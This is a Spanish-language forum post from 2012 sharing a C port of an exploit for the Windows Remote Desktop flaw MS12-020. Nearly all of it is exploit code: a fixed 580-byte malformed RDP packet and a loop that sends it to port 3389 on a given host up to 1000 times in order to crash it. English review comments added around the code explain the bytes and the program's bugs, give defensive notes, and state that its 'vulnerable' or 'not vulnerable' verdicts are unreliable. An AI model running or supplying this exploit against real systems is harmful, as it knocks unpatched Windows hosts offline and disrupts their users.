Crash Windows (MS12_020) implementación en C
Publicado: 16 Mar 2012, 14:57
Bueno, solamente hice una traducción a C... y alguna que otra modificación de un exploit chino que explota una de las últimas vulnerabilidades públicas conocidas de Windows, cuando éste tiene abierto el puerto 3389 (escritorio remoto). Sin más, dejo el original en Python y su traducción a C.
Salud
#include "stdio.h"
#include "winsock2.h"
#pragma comment(lib, "ws2_32.lib")
/*
 * hexosni: fixed 580-element byte buffer that main() passes unchanged to
 * send() on every connection it opens to TCP port 3389. Nothing in this file
 * builds or parses these bytes; they are a static, pre-recorded sequence, so
 * the data on the wire is identical on every connection.
 *
 * Readable ASCII fragments inside the buffer spell "rdpdr", "cliprdr" and
 * "rdpsnd".
 * NOTE(review): these look like RDP virtual-channel names inside a client
 * connection sequence -- confirm against a protocol reference before relying
 * on that reading (e.g. when writing a network signature for this traffic).
 *
 * NOTE(review): the element type is plain char while several initialisers
 * exceed 0x7f (0xe0, 0xf0, 0xff, ...). Where char is signed the conversion is
 * implementation-defined; unsigned char is the usual type for raw bytes.
 */
const char hexosni[580]={0x03,0x00,0x00,0x13,0x0e,0xe0,0x00,0x00,0x00,0x00,0x00,0x01,
0x00,0x08,0x00,0x00,0x00,0x00,0x00,0x03,0x00,0x01,0xd6,0x02,0xf0,0x80,0x7f,0x65,0x82,
0x01,0x94,0x04,0x01,0x01,0x04,0x01,0x01,0x01,0x01,0xff,0x30,0x19,0x02,0x04,0x00,0x00,
0x00,0x00,0x02,0x04,0x00,0x00,0x00,0x02,0x02,0x04,0x00,0x00,0x00,0x00,0x02,0x04,0x00,
0x00,0x00,0x01,0x02,0x04,0x00,0x00,0x00,0x00,0x02,0x04,0x00,0x00,0x00,0x01,0x02,0x02,
0xff,0xff,0x02,0x04,0x00,0x00,0x00,0x02,0x30,0x19,0x02,0x04,0x00,0x00,0x00,0x01,0x02,
0x04,0x00,0x00,0x00,0x01,0x02,0x04,0x00,0x00,0x00,0x01,0x02,0x04,0x00,0x00,0x00,0x01,
0x02,0x04,0x00,0x00,0x00,0x00,0x02,0x04,0x00,0x00,0x00,0x01,0x02,0x02,0x04,0x20,0x02,
0x04,0x00,0x00,0x00,0x02,0x30,0x1c,0x02,0x02,0xff,0xff,0x02,0x02,0xfc,0x17,0x02,0x02,
0xff,0xff,0x02,0x04,0x00,0x00,0x00,0x01,0x02,0x04,0x00,0x00,0x00,0x00,0x02,0x04,0x00,
0x00,0x00,0x01,0x02,0x02,0xff,0xff,0x02,0x04,0x00,0x00,0x00,0x02,0x04,0x82,0x01,0x33,
0x00,0x05,0x00,0x14,0x7c,0x00,0x01,0x81,0x2a,0x00,0x08,0x00,0x10,0x00,0x01,0xc0,0x00,
0x44,0x75,0x63,0x61,0x81,0x1c,0x01,0xc0,0xd8,0x00,0x04,0x00,0x08,0x00,0x80,0x02,0xe0,
0x01,0x01,0xca,0x03,0xaa,0x09,0x04,0x00,0x00,0xce,0x0e,0x00,0x00,0x48,0x00,0x4f,0x00,
0x53,0x00,0x54,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x04,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x0c,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x01,0xca,0x01,0x00,0x00,0x00,0x00,0x00,0x10,0x00,0x07,0x00,0x01,0x00,0x30,
0x00,0x30,0x00,0x30,0x00,0x30,0x00,0x30,0x00,0x2d,0x00,0x30,0x00,0x30,0x00,0x30,0x00,
0x2d,0x00,0x30,0x00,0x30,0x00,0x30,0x00,0x30,0x00,0x30,0x00,0x30,0x00,0x30,0x00,0x2d,
0x00,0x30,0x00,0x30,0x00,0x30,0x00,0x30,0x00,0x30,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x04,0xc0,0x0c,0x00,0x0d,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x02,0xc0,0x0c,0x00,
0x1b,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x03,0xc0,0x2c,0x00,0x03,0x00,0x00,0x00,0x72,
0x64,0x70,0x64,0x72,0x00,0x00,0x00,0x00,0x00,0x80,0x80,0x63,0x6c,0x69,0x70,0x72,0x64,
0x72,0x00,0x00,0x00,0xa0,0xc0,0x72,0x64,0x70,0x73,0x6e,0x64,0x00,0x00,0x00,0x00,0x00,
0xc0,0x03,0x00,0x00,0x0c,0x02,0xf0,0x80,0x04,0x01,0x00,0x01,0x00,0x03,0x00,0x00,0x08,
0x02,0xf0,0x80,0x28,0x03,0x00,0x00,0x0c,0x02,0xf0,0x80,0x38,0x00,0x06,0x03,0xef,0x03,
0x00,0x00,0x0c,0x02,0xf0,0x80,0x38,0x00,0x06,0x03,0xeb,0x03,0x00,0x00,0x0c,0x02,0xf0,
0x80,0x38,0x00,0x06,0x03,0xec,0x03,0x00,0x00,0x0c,0x02,0xf0,0x80,0x38,0x00,0x06,0x03,
0xed,0x03,0x00,0x00,0x0c,0x02,0xf0,0x80,0x38,0x00,0x06,0x03,0xee,0x03,0x00,0x00,0x0b,
0x06,0xd0,0x00,0x00,0x12,0x34,0x00 };
/*
 * Opens up to 1000 TCP connections to port 3389 on the IPv4 address given in
 * argv[1], sends the static hexosni buffer on each one, and prints a verdict
 * derived only from whether connect() keeps succeeding.
 *
 * Returns 0 on the early-exit paths (socket check or connect() failure) and
 * 1 after all 1000 iterations complete.
 *
 * What a defender sees from this loop: many back-to-back TCP connections from
 * one source to 3389, each carrying the same 580-byte burst in a single
 * send() and never reading a reply. The fix for the underlying flaw is the
 * MS12-020 update; limiting which networks can reach 3389 narrows exposure.
 *
 * NOTE(review): the printed verdicts are not reliable evidence either way;
 * see the comments at each decision point below.
 */
int main(int argc, char* argv[])
{
WSADATA wsaData;
SOCKET hSocket;
struct sockaddr_in toTest;
int result;
/* NOTE(review): the WSAStartup() return value is ignored and WSACleanup()
   is never called on any path. */
WSAStartup(MAKEWORD(2, 2), &wsaData);
/* NOTE(review): argc is never checked, so argv[1] is NULL when the program
   is started without an argument; it is then passed to printf("%s") here and
   to inet_addr() below. */
printf("Testeando %s...", argv[1]);
for (int i=0;i<1000;i++)
{
printf (".");
hSocket = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
/* NOTE(review): Winsock reports socket() failure as INVALID_SOCKET, not 0,
   so this test does not catch a failed socket(); the failure surfaces later
   as a connect() error and is then misreported by the branch below. */
if (hSocket == 0)
return 0;
/* toTest is filled field by field and never zeroed, so sin_zero keeps
   whatever was on the stack. */
toTest.sin_family = AF_INET;
toTest.sin_port = htons(3389);
/* NOTE(review): inet_addr() returns INADDR_NONE for an unparsable address;
   that result is not checked before use. */
toTest.sin_addr.s_addr = inet_addr(argv[1]);
result = connect(hSocket, (SOCKADDR*)&toTest, sizeof(toTest));
if (result != 0)
{
/* Any connect() failure from the third iteration on (i > 1) is reported as
   a crash of the remote host; a failure on the first two is reported as a
   closed port. The error code is never examined, so a firewall drop, a
   timeout, a listener backlog limit or local socket exhaustion (handles from
   earlier iterations are never closed) all produce the same "0wn3d" line. */
if (i>1)
printf("\n0wn3d");
else
printf("\nPuerto Cerrado");
/* hSocket is not closed on this path. */
return 0;
}
/* The send() result is stored but never inspected, and the socket is left
   open when the loop moves on to the next iteration. */
result = send(hSocket, hexosni, sizeof(hexosni), 0);
}
/* Reached only when all 1000 connect() calls succeeded. That shows the
   listener kept accepting connections, not that the host has the MS12-020
   update installed; patch state has to be confirmed on the host itself. */
printf("\nNo vulnerable");
/* Only the socket from the final iteration is closed. */
closesocket(hSocket);
return 1;
}